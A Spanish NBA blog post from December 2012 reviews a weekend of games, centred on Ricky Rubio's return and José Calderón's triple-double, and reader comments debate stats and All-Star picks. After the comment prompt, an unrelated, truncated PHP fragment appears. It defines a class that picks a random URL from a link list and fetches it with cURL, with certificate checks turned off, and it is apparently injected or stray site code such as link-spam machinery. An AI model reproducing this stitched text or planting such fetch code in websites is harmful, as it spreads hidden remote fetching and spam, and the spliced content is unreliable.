Informe del fin de semana: Y Ricky cogió su fusil

17 de December de 2012 por TheDeerHunter

Han pasado cosas muy interesantes este fin de semana pero como puede palparse en los comentarios del post de marras, por encima de todo. los focos se los llevó el regreso a las canchas de Ricard Rubio la noche del sábado. Pero vamos… que casi nos atreveríamos a decir a que esto no ha sido nada comparado con cómo se ha vivido el asunto en los USA, especialmente en el área de Minneapolis.

No pintaba bien el partido contra Dallas. Love de baja enfermo y los Mavs comenzaban el choque “como Pedro por su casa”. Daimiel comentaba la mala pinta que comienza a tener Derrick Williams… y en eso:

“Se cae el Target Center.” Pop dixit. 2:27am.

Honestamente no hubiera imaginado tal recibimiento. Las gradas pedían magia y Ricky no les hizo esperar mucho. Dos o tres relámpagos en forma de pase que hasta a sus compañeros les costó hacer buenos. El casillero de asistencias terminó sumando alguna menos de las que dio.

“He brings us all energy, man. No words can really describe it.” Derrick Williams.

Y es que si alguien tiene que estar contento del regreso ese es el bueno de Derrick. Del jugador inoperante que deambulaba antes de salir el catalán al ejecutor que terminó el choque hay un trecho. También lo hubo en la defensa, en las gradas, en el rendimiento específico de cada uno o incluso en la afectación sobre unos rivales sorprendidos… Es increíble el efecto que produce la simple presencia de un jugador. Un chute de adrenalina llamado Ricky.

No sabemos qué hubiera pasado de anotar Ricky el triple para ganar. También hay que decir que los Wolves llevaban 3 victorias seguidas antes del sábado y que los Mavs lo pusieron bastante fácil en la prórroga. En cualquier caso no seremos nosotros quienes saquen a aquella gente de este momento de ilusión. Los Wolves nos molan. 

No sólo es el fin de semana de Ricky. Lo es también el de Calderón. Ayer cerró con un extraordinario triple doble un fin de semana perfecto, con el valor añadido de cada victoria lograda por Toronto. Contra Mavericks el viernes y anoche contra Houston. Lowry lesionado y una creciente sensación de que el equipo funciona mejor sin ese gran base en pista.

“I want to be the most professional player in the NBA. I don’t know if I’m going to be on the court or not but I want this team to win”

La honesta firma de Calderón que no sorprende a quien lo conozca. Otra forma de liderazgo, muy alejada de los “Lost in traslation” recientes de Andrea Bargnani.

La tercera pata del fin de semana tocan de forma indirecta a otro español. Lakers again. 2 victorias que rompen un poco con la estadística de Kobe por encima de los 30 puntos. Una regulera contra Washington y anoche ante Sixers. Pinta mal para Pau, porque la línea no da pistas de que D’Antoni vaya a adaptar su sistema a él, sino quizá al contrario. Anoche Artest jugó de 4 y lo hizo bien, marcando récord de rebotes de su carrera. También va a sobrar Jamison ahora.

Caldo de debate, de paso, en las declaraciones de Bynum sobre que Kobe coartaba su desarrollo y su “libertad creativa” (esto lo añado yo). Nada dijo de sus propios actos o el beneficio de llevar una conejita a hombros, con las rodillas trituradas. La culpa a Kobe, que es más fácil. Ni original llega a ser.

Del resto del fin de semana pasaremos un poco de puntillas:

Viernes: Hibbert hizo el partido del año en la victoria ante Sixers; Orlando logró romper la racha victoriosa de los Warriors por el Este; los Nets ganaron a Detroit con doble prórroga; Monta logró el récord de anotación del año en la victoria de Bucks sobre Cavs; Harden trituró a los Celtics; 10ª consecutiva de Thunder frente a Kings; Dudley y los Suns doblegaron a Utah y los Grizzlies cayeron en Denver.

Sábado: Orlando 2 de 2 en fin de semana contra Bobcats (11ª derrota consecutiva); victoria de Warriors en Atlanta; el mejor partido de un Irving enmascarado no sirvió para doblegar a los Knicks; Heat destrozaron a Wizards; Pacers sin problemas vs Detroit; Bulls pararon a Nets; Clippers 9ª consecutiva contra Bucks; Spurs y Grizzlies ganaron fácil a Celtics y Jazz respectivamente.

Domingo: Triplazo ganador de Lillard contra Hornets y victoria sobrada de Denver ante Kings.

PREMIOS

MVP: 2 partidos anotando 30 o más puntos y 2 victorias para los Lakers. Contra los Wizards, Kobe Bryant no estuvo muy acertado (9 de 29 en tiros de campo) pero su partido contra los Sixers fue de nivel. Su compañero Metta World Peace también fue pieza clave en las 2 victorias recogiendo 16 rebotes ayer mismo. JJ Hickson cogió los mismos rebotes y además anotó 24 puntos ante New Orleans. Jose Calderon también ha ganado sus dos partidos con triple doble en el segundo de ellos, prácticamente lo mismo que George Hill: Triple doble el viernes y buen partido el sábado. Pero para ficha estadística destacada el 5×5 de Nicolas Batum: 11 puntos, 10 asistencias, 5 rebotes, 5 tapones y 5 robos.

Rookie: Damian Lillard sigue siendo el mejor mientras Anthony Davis se recupera de sus problemas físicos. En los 2 partidos del fin de semana, el jugador de los Hornets ha promediado 13 puntos y 6 rebotes. Su compañero Austin Rivers anotó 27 puntos el viernes. También el viernes, Andrew Nicholson nos dejó un muy buen partido con 15 puntos, 9 rebotes y 4 tapones y Harrison Barnes anotó 19 puntos el sábado. Por su parte, Andre Drummond promedió 10’5 puntos, 9 rebotes y 3 tapones en sus 2 partidos del fin de  semana. Finalmente destacar el buen papel de Alexey Shved como titular en los Wolves.

Sorpresa: Matt Barnes es pieza clave en el banco de los Clippers. El sábado anotó 21 puntos. Nikola Vucevic sigue sorprendiendo a propios y extraños. En los 2 partidos del fin de semana anotó 12’5 puntos de media y capturó 15 rebotes.

Decepción: Dos derrotas de los Kings con John Salmons haciendo el ridículo: 1 de 7 el viernes y 1-8 el domingo.

Esfuerzo en vano: Los Warriors perdieron el viernes pero David Lee acumula 5 partidos anotando más de 20 puntos y capturando más de 10 rebotes. ¿Como es que todavía nadie le llama Mr. 20-10? Kyrie Irving anotó 26 puntos el viernes y 41 el sábado pero los Cavs cayeron en ambos partidos.

Comenta

25 comentarios a esta entrada

  1. Jose Luis dice:
    #1

    Nadie, desde 1985, había hecho lo que Calderón: 14 puntos, 10 rebotes, 18 asistencias, 0 pérdidas, 1 robo y 1 tapón. NADIE. ¡Quiero ver a Calde el año que viene en un equipo de play-offs!

      Citar

  2. txusma dice:
    #2

    Un payaso este Bynum. Lo siento pero alguien lo tenía que decir.

      Citar

  3. TheDeerHunter dice:
    #3

    ¿Lo dices por el pelo? XD

      Citar

  4. Jose Luis dice:
    #4

    La verdad es que al final estuvo echándose unas risas con Bryant, Gasol, Morris… no sé, es un cabeza loca, y estas declaraciones no venían mucho a cuento, la verdad.

      Citar

  5. Esteban dice:
    #5

    calderon deberia resignar la mitad de su salario y rescindirlo, los mavs lo recibirian con los brazos abiertos, loa lakers tambien y hasta el thunder

    ojala q haga algo por su carrera deportiva

      Citar

  6. Denise dice:
    #6

    Jose Luis: Nadie, desde 1985, había hecho lo que Calderón: 14 puntos, 10 rebotes, 18 asistencias, 0 pérdidas, 1 robo y 1 tapón. NADIE. ¡Quiero ver a Calde el año que viene en un equipo de play-offs!

    Pero a que numeros te refieres exactamente?? porque así a la cabeza se me vienen muchos mejores numeros de Rondo, Nash, Lebron, KIdd…

      Citar

  7. Jose Luis dice:
    #7

    Vale, para empezar lo he puesto mal. Eran 18 puntos, 10 rebotes, 14 asistencias, 0 pérdidas, 1 robo y 1 tapón.

    En twitter lo dijo Alberto de Roa, @TikotDeRoa. Supongo que se refiere a que nadie había hecho ese 18-10-14 (que es complicado pero lo hemos visto muchas veces, ciertamente) con 0 pérdidas, y añadiéndole 1 robo y 1 tapón

      Citar

  8. Denise dice:
    #8

    Jose Luis: Vale, para empezar lo he puesto mal. Eran 18 puntos, 10 rebotes, 14 asistencias, 0 pérdidas, 1 robo y 1 tapón.En twitter lo dijo Alberto de Roa, @TikotDeRoa. Supongo que se refiere a que nadie había hecho ese 18-10-14 (que es complicado pero lo hemos visto muchas veces, ciertamente) con 0 pérdidas, y añadiéndole 1 robo y 1 tapón

    No le quito meritos a Calderón, pero creo que esos numeros han sido ampliamente superados recientemente, a no ser que lo que se refiera ese comentario, es que nunca nadie ha hecho esos datos exactamente…; supongo que por esa regla de 3, también nadie habrá hecho un 2 de 12 para 4 puntos

      Citar

  9. Esteban dice:
    #9

    rondo ha hecho numeros ejores que esos, el dia que firmo 20 asistencias tambien fue tirple doble,

    el dato llamativo debe estar en sus 0 perdidas mas que en los otros numeros

      Citar

  10. rumbero dice:
    #10

    Son de esas estadísiticas un poco patilleras, pero es esta se trata de hacer al menos 18 puntos, 14 asistencias y 10 rebotes sin perder un balón. El último en conseguirlo en el 2002 fue..Antoine Walker! Grande. Anteriormente lo hicieron también Scott Skiles y Kidd, pero si contamos además ese robo y tapón pues ya hay que remontarse al 1985 como decía Jose Luis

    Ya que estamos tela también con el 5×5 de Batum: 11 puntos, 10 asistencias, 5 rebotes, 5 tapones y 5 robos.

      Citar

  11. HisRoyalAirness dice:
    #11

    Joe chicos, porque no estuve el fin de semana en casa pero os hubiese suplicado escribir una de mis loas a Ricard.
    Qué emoción, en serio. Qué maravilla.
    Me quedo con el tweet de Gonzalo Vazquez (uno de los tipos más objetivos y menos forofos del panorama basket) cuando Ricky suelta la asistencia entre las piernas: “La madre que me parió que lleva 9 meses sin jugar.”

    No me esperaba una irrupción así, pensaba que iba a estar más renqueante. Sí que le noté la lesión pero es que el cabrón juega con el cerebro.
    Tremendos Pek, AK y Shved que no deja de impresionarme. Pedazo de jugador para la NBA: buen tiro, físico e inteligencia.

      Citar

  12. Esteban dice:
    #12

    Hablando de sophomore, q chaval ese irving, una pena su fisico tan endeble, sino tiene pasta de futuro MVP

    Bases en el all star del este

    Rondo, deron, irving, jennigs, felton?

      Citar

  13. Jose Luis dice:
    #13

    Jennings no creo, antes va Holiday. Irving está por ver, yo no le llevaría. Vi los 41 puntos y la mayoría eran tiros disputados. Eso lo hace en 20 partidos y no alcanza 25 puntos ni 3 veces.

      Citar

  14. Jose Luis dice:
    #14

    Incluso Teague podría ir… además para eso también cuenta el balance no? Los cavs dudo que suban muy arriba.

    Eso sí, de escoltas está desierto el Este… Solo llevaría a Wade al all-star, y quizá Afflalo porque está haciendo números aunque sin victorias. ¿Quizá Turner?

      Citar

  15. Vader dice:
    #15

    JR Smith es el segundo mejor escolta del Este… 🙂

      Citar

  16. Esteban dice:
    #16

    Jose Luis: los 41 puntos y la mayoría eran tiros disputados

    como todos los años ante la falta de escoltas en el este terminara yendo JO JHONSON

    este año monta ellis ha hecho cosas buenas tambien, irving podria ir como escolta o hasta derozan a pensar del balance de los raptors

      Citar

  17. Esteban dice:
    #17

    Jose Luis:
    Incluso Teague podría ir… además para eso también cuenta el balance no? Los cavs dudo que suban muy arriba.

    Eso sí, de escoltas está desierto el Este… Solo llevaría a Wade al all-star, y quizá Afflalo porque está haciendo números aunque sin victorias. ¿Quizá Turner?

    quise citar este comentario

      Citar

  18. melo15 dice:
    #18

    Vamos a ver, Irving al All-Star ni de coña, que empieze a ser mas egoista porque no son la cantidad de puntos que pueda meter lo que le llevara lejos sino la capacidad de involucrar a sus compañeros.
    Jennings empezo super bien pero se ha diluido mucho y encima con malos porcentajes.
    Yo llevaria a Holiday y a Rondo porque se lo merecen, y a Deron porque tiene nombre.
    Y en el Oeste, Westbrook, Paul y Curry han de ir casi seguro y de escolta a Mayo, Harden y Bryant. En el Este no hay muchos escoltas asi que yo pondria a Wade y a alguien mas, aunque si Turner sigue con esta progresion me lo pensaria.

      Citar

  19. Pikerton64 dice:
    #19

    ¿Y qué más da que no hayan escoltas? Quiero decir, ¿no se votan Frontcourt y Backcourt? De Frontcourt en el Este pueden ir Rondo (L), Wade y Holiday. Deron irá por nombre, pero nunca me ha gustado, no sé. Ellis, Jennings, Irving, Joe, Kidd, Felton e incluso Kemba al comienzo (cuando ganaban). Turner juega de 3, alero, ¿nop? De todos modos, si Rose está sano…

      Citar

  20. HisRoyalAirness dice:
    #20

    Pikerton64:
    ¿Y qué más da que no hayan escoltas? Quiero decir, ¿no se votan Frontcourt y Backcourt? De Frontcourt en el Este pueden ir Rondo (L), Wade y Holiday. Deron irá por nombre, pero nunca me ha gustado, no sé. Ellis, Jennings, Irving, Joe, Kidd, Felton e incluso Kemba al comienzo (cuando ganaban). Turner juega de 3, alero, ¿nop? De todos modos, si Rose está sano…

    Esto venía a poner…
    Qué más da el puesto de escolta? Si es más que probable que en el quinteto inicial del Este no haya ni pivot!!

    Además quiero recordar que el voto popular sólo elige a 5, el resto lo hacen los entrenadores.

    Mis quintetos hasta el momento (por méritos y números):

    Oeste: Parker – Bryant – Durant – Randolph – Marc (sí, Marc. Howard está jugando en un equipo que produce náuseas)

    Este: Rondo – Wade – Lebron – Carmelo – Varejao

      Citar

  21. simon dice:
    #21

    HisRoyalAirness:

    Mis quintetos hasta el momento (por méritos y números):

    Oeste: Parker – Bryant – Durant – Randolph – Marc (sí, Marc. Howard está jugando en un equipo que produce náuseas)

    Este: Rondo – Wade – Lebron – Carmelo – Varejao

    ¿Parker antes que Paul?

      Citar

  22. melo15 dice:
    #22

    Difiero contigo Airness, si dejas fuera a Howard (que no te lo discuto) entonces no entiendo porque pones a Varejao o a Wade. Si no hay posiciones entonces Holiday tendria que estar en el 5 inicial y creo que Chris Paul ha hecho mas meritos para aparecer en el quinteto que Marc o Parker. Ademas no hay que olvidarse que las victorias tienen su valor, yo a Varejao no lo llamaria al All-Star y si llamaria a Horford (titular) y a otro Center, como Bosh o Brook Lopez. Esque poner a Varejao de tirular es totalmente ironico, un jugador por muchos rebotes que coja no deberia ir al all-star si su equipo ha ganado 6 partidos, es surrealista.
    Para mi seria:
    Este: Rondo-Holiday-Lebron-Melo-Horford y en el banco: Deron, Wade, Bosh, Lopez, Smith, Jennings…
    Oeste: Parker-Paul-Bryant-Durant-Randolph y despues a Howard, Duncan, Mayo, Harden, Westbrook, Marc y Curry.

      Citar

  23. Chipi dice:
    #23

    Ni Parker ni Paul. Es voto popular, así que Lin xD

      Citar

  24. Jose Luis dice:
    #24

    Aparte, no puedes poner 3 guards de titulares. Y centers creo que no va a ir ni uno de titular al all-star. Howard si va por votos es por el nombre, y en el este, Varejao no va a ir por votos, ni López. Horford quizá por la comunidad Dominicana-Latina, pero para mí siempre ha sido más un 4 que un 5. Ni un center al all-star.

      Citar

  25. HisRoyalAirness dice:
    #25

    He puesto a Varejao porque numericamente está haciendo un temporadón. Pondría sino a Noah, que está jugando de perlas.

    Melo, lo de Paul-Parker-Bryant no puedes hacerlo para empezar.

    En cuanto a Parker antes que Paul? Números muy similares, Parker me cae mejor y su equipo lleva una victoria más.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>